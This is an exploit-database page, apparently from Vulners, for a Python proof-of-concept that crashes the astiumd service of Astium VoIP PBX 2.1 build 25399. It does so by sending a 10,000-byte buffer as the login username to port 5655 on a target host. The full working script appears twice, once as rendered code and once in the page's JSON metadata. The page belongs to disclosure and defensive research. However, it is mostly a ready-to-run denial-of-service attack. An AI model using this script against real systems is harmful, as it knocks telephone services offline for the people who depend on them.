Search...

Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)

2013-01-02T00:00:00

ID EXPLOITPACK:8427A558C95027961E49BCD00B39EA09
Type exploitpack
Reporter xistence
Modified 2013-01-02T00:00:00

Description

Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)

                                        
                                            #!/usr/bin/python
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : Astium VoIP PBX &lt;= v2.1 build 25399 Remote Crash PoC
# Date              : 01-02-2012
# Author            : xistence (xistence&lt;[AT]&gt;0x90.nl)
# Software link     : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en
# Vendor site       : http://www.oneip.nl/
# Version           : v2.1 build 25399
# Tested on         : CentOS 5.x 32-bit
#
# Vulnerability	    : The "astiumd" service on port 5655 crashes and restarts when sending a large buffer.
#		     
#		      Entries in /var/log/astiumd.log after executing script:
#                     Astiumd ended with exit status 139 &lt;-- Segmentation Fault
#		      Automatically restarting Astiumd
#+--------------------------------------------------------------------------------------------------------------------------------+


import socket, sys

port = 5655
payload = "\x41"*10000

print ""
print "[*] Astium VoIP PBX &lt;= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02"
print ""

if (len(sys.argv) != 2):
    print "[*] Usage: " + sys.argv[0] + " &lt;RHOST&gt;"
    print ""
    exit(0)

rhost = sys.argv[1]

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((rhost,port))
        data = s.recv(1024)
        print "[*] %s" %data
	print "[*] Sending payload!"
        s.send("Action: Login\r\n")
        s.send("Username: " + payload + "\r\n")
        s.send("Secret: hax0r\r\n")
        s.send("\r\n")
	s.close()
except:
	print "Error!"

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nAstium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)", "edition": 1, "reporter": "xistence", "exploitpack": {"type": "dos", "platform": "linux"}, "published": "2013-01-02T00:00:00", "title": "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:05", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-04-01T19:04:05", "rev": 2}, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-01-02T00:00:00", "id": "EXPLOITPACK:8427A558C95027961E49BCD00B39EA09", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/python\n#+--------------------------------------------------------------------------------------------------------------------------------+\n# Exploit Title : Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC\n# Date : 01-02-2012\n# Author : xistence (xistence<[AT]>0x90.nl)\n# Software link : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en\n# Vendor site : http://www.oneip.nl/\n# Version : v2.1 build 25399\n# Tested on : CentOS 5.x 32-bit\n#\n# Vulnerability\t : The \"astiumd\" service on port 5655 crashes and restarts when sending a large buffer.\n#\t\t \n#\t\t Entries in /var/log/astiumd.log after executing script:\n# Astiumd ended with exit status 139 <-- Segmentation Fault\n#\t\t Automatically restarting Astiumd\n#+--------------------------------------------------------------------------------------------------------------------------------+\n\n\nimport socket, sys\n\nport = 5655\npayload = \"\\x41\"*10000\n\nprint \"\"\nprint \"[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02\"\nprint \"\"\n\nif (len(sys.argv) != 2):\n print \"[*] Usage: \" + sys.argv[0] + \" <RHOST>\"\n print \"\"\n exit(0)\n\nrhost = sys.argv[1]\n\ntry:\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((rhost,port))\n data = s.recv(1024)\n print \"[*] %s\" %data\n\tprint \"[*] Sending payload!\"\n s.send(\"Action: Login\\r\\n\")\n s.send(\"Username: \" + payload + \"\\r\\n\")\n s.send(\"Secret: hax0r\\r\\n\")\n s.send(\"\\r\\n\")\n\ts.close()\nexcept:\n\tprint \"Error!\"", "cvss": {"score": 0.0, "vector": "NONE"}}